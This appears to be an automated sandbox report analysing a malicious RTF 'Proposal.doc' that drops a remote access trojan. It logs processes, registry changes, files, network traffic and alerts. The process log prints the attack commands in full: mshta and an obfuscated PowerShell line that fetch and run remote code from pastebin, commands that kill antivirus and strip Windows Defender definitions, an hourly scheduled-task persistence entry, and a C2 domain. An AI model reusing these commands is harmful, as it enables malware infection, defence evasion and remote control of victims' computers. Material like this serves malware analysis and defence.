File name: | Proposal.doc |
Full analysis: | https://app.any.run/tasks/e6155828-21ca-4489-8bd3-d4c049cfc7c6 |
Verdict: | Malicious activity |
Threats: | Remote access trojans (RATs) are a type of malware that enables attackers to establish complete to partial control over infected computers. Such malicious programs often have a modular design, offering a wide range of functionalities for conducting illicit activities on compromised systems. Some of the most common features of RATs include access to the users’ data, webcam, and keystrokes. This malware is often distributed through phishing emails and links. |
Analysis date: | May 14, 2019, 23:14:40 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | text/rtf |
File info: | Rich Text Format data, version 1, ANSI |
MD5: | 6EDC7C666CDCD12F7905DDAF92218DF5 |
SHA1: | D8FF8534BD441317830894F52CE5EC8B69725471 |
SHA256: | 62B076EFFD55499B3F2485976494C9D7B329744BFA34438ABECB6F8A4A385337 |
SSDEEP: | 3072:l/RE7QuGU/REDQuGn/RE7QuGi/REvQuGv/REXQuGn/REvQuGm:lZ4HZgQZQNZEUZcUZ0B |
.rtf | | | Rich Text Format (100) |
---|
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3456 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Downloads\Proposal.doc.rtf" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2312 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 | ||||
2920 | mshta https://jackasswork.blogspot.com/p/heroday1.html | C:\Windows\system32\mshta.exe | EXCEL.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Exit code: 0 Version: 8.00.7600.16385 (win7_rtm.090713-1255) | ||||
2956 | "C:\Windows\System32\mshta.exe" http://pastebin.com/raw/JfgU501E | C:\Windows\System32\mshta.exe | mshta.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Exit code: 0 Version: 8.00.7600.16385 (win7_rtm.090713-1255) | ||||
868 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 | ||||
3308 | "C:\Windows\System32\cmd.exe" /C forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & exit | C:\Windows\System32\cmd.exe | — | mshta.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2624 | "C:\Windows\System32\cmd.exe" /c cd "C:\Program Files\Windows Defender" & MpCmdRun.exe -removedefinitions -dynamicsignatures & forfiles /c "taskkill /f /im MSASCuiL.exe" & forfiles /c "taskkill /f /im MpCmdRun.exe" & exit | C:\Windows\System32\cmd.exe | — | mshta.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3604 | "C:\Windows\System32\forfiles.exe" /c "cmd /c powershell -noexit [ReFlEcTiOn.AsSeMbLy]::LoAd([CoNvErT]::FrOmBaSe64StRiNg((NeW-ObJeCt NeT.WeBClIeNt).DoWnLoAdStRiNg('h' + 't' + 't' + 'p' + 's' + ':' + '/' + '/' + 'pastebin.com/raw/ELL8v8tv'))).EnTrYPoInT.InVoKe($N,$N)" | C:\Windows\System32\forfiles.exe | — | mshta.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: ForFiles - Executes a command on selected files Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1160 | "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 60 /tn "MSOFFICEER" /tr "mshta vbscript:CreateObject(\"Wscript.Shell\").Run(\"mshta.exe https://pastebin.com/raw/ELL8v8tv\",0,true)(window.close)" /F | C:\Windows\System32\schtasks.exe | — | mshta.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3568 | forfiles /c "taskkill /f /im AvastUi.exe" | C:\Windows\system32\forfiles.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: ForFiles - Executes a command on selected files Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
(PID) Process: | (3456) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
Operation: | write | Name: | hy> |
Value: 68793E00800D0000010000000000000000000000 | |||
(PID) Process: | (3456) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1033 |
Value: Off | |||
(PID) Process: | (3456) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1033 |
Value: On | |||
(PID) Process: | (3456) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
Operation: | write | Name: | WORDFiles |
Value: 1320091678 | |||
(PID) Process: | (3456) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
Operation: | write | Name: | ProductFiles |
Value: 1320091792 | |||
(PID) Process: | (3456) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
Operation: | write | Name: | ProductFiles |
Value: 1320091793 | |||
(PID) Process: | (3456) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word |
Operation: | write | Name: | MTTT |
Value: 800D0000648A3CDFAA0AD50100000000 | |||
(PID) Process: | (3456) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
Operation: | write | Name: | ={> |
Value: 3D7B3E00800D000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 | |||
(PID) Process: | (3456) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
Operation: | delete value | Name: | ={> |
Value: 3D7B3E00800D000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 | |||
(PID) Process: | (3456) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | UNCAsIntranet |
Value: 0 |
PID | Process | Filename | Type | |
---|---|---|---|---|
3456 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRFD58.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2312 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR845.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2920 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JGRR2OYX\error[1] | — | |
MD5:— | SHA256:— | |||
2920 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LH043OAM\error[1] | — | |
MD5:— | SHA256:— | |||
2920 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LH043OAM\warning[1] | — | |
MD5:— | SHA256:— | |||
3456 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3953F2BF.wmf | wmf | |
MD5:19C46A216C9F1054D4E7092153E26B0C | SHA256:443FB08DEEADC170AC72431A9A9826A9269A0E6FF251C3EF1884C798E0D28C30 | |||
2920 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LH043OAM\3820394884-comment_from_post_iframe[1].js | html | |
MD5:EFBC37B403F3B31F1F690DD4AE30BD0A | SHA256:13F704A9D63CD994E5A6AAF72E1B3771FF92DB5CB0750F649E60D50933CEFAED | |||
3456 | WINWORD.EXE | C:\Users\admin\Downloads\~$oposal.doc.rtf | pgc | |
MD5:7CCE026D7DE1E99C9AC7E24C19CC88E3 | SHA256:CCC9A0663AC73A382D5CF7B7C398ADD6DE836181007FB6C8E7408A3E7FE8BB2C | |||
2920 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\2905083093-widgets[1].js | text | |
MD5:D5554BC3E4DE42F271008E0A3B4EA92D | SHA256:E71B63863DFBD4B79FD95AE95D5A88F8AE781055DEF150B764C5D6C252E66C7B | |||
3456 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:17222E7BED955763CB75EBDA153E0074 | SHA256:EAEB163582F92B56C14963150DA7DBEA34565552F3D187A793BE19BEB0978882 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2956 | mshta.exe | GET | 200 | 104.20.209.21:80 | http://pastebin.com/raw/JfgU501E | US | html | 716 b | shared |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2920 | mshta.exe | 172.217.16.161:443 | jackasswork.blogspot.com | Google Inc. | US | whitelisted |
2852 | mshta.exe | 216.58.205.237:443 | accounts.google.com | Google Inc. | US | whitelisted |
2956 | mshta.exe | 104.20.209.21:80 | pastebin.com | Cloudflare Inc | US | shared |
2832 | powershell.exe | 104.20.209.21:443 | pastebin.com | Cloudflare Inc | US | shared |
2852 | mshta.exe | 172.217.22.41:443 | www.blogger.com | Google Inc. | US | whitelisted |
2920 | mshta.exe | 172.217.22.41:443 | www.blogger.com | Google Inc. | US | whitelisted |
2852 | mshta.exe | 172.217.16.161:443 | jackasswork.blogspot.com | Google Inc. | US | whitelisted |
916 | powershell.exe | 104.20.209.21:443 | pastebin.com | Cloudflare Inc | US | shared |
916 | powershell.exe | 23.249.165.147:2336 | mannyddd.duckdns.org | ColoCrossing | US | malicious |
1492 | mshta.exe | 172.217.16.161:443 | jackasswork.blogspot.com | Google Inc. | US | whitelisted |
Domain | IP | Reputation |
---|---|---|
jackasswork.blogspot.com |
| whitelisted |
www.blogger.com |
| shared |
resources.blogblog.com |
| whitelisted |
pastebin.com |
| shared |
accounts.google.com |
| shared |
mannyddd.duckdns.org |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
2956 | mshta.exe | Misc activity | SUSPICIOUS [PTsecurity] Cmd.Powershell.Download HTTP UserAgent (Win7) |
— | — | Misc activity | ET INFO DYNAMIC_DNS Query to *.duckdns. Domain |
916 | powershell.exe | A Network Trojan was detected | MALWARE [PTsecurity] Revenge/hamza-RAT CnC Checkin |